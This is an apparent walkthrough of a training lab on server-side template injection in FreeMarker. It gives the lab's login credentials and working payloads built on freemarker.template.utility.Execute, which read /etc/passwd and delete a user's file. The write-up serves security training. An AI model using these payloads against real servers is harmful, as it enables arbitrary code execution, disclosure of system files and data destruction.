Lab: Server-side template injection using documentation

This lab is vulnerable to server-side template injection. To solve the lab, identify the template engine and use the documentation to work out how to execute arbitrary code, then delete the morale.txt file from Carlos's home directory.

You can log in to your own account using the following credentials:

content-manager:C0nt3ntM4n4g3r

You should try solving this lab using only the documentation. However, if you get really stuck, you can try finding a well-known exploit by @albinowax that you can use to solve the lab.

Steps

Login to the website using the given credentials
Click on View details of any product
Click on Edit template button
Remove the .name from any template syntax

${product.name}

to

${product}

Click on Save and View the Product Details
We can see that the website is using FreeMarker Template engine
Now view the /cat/passwd file

${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}

We can see that the webserver is vulnerable to SSTI
Delete the morale.txt file

${"freemarker.template.utility.Execute"?new()("rm /home/carlos/morale.txt")}

Congrats! You have solved the lab.

PreviousLab: Basic server-side template injection (code context)NextLab: Server-side template injection in an unknown language with a documented exploit

Last updated 10 months ago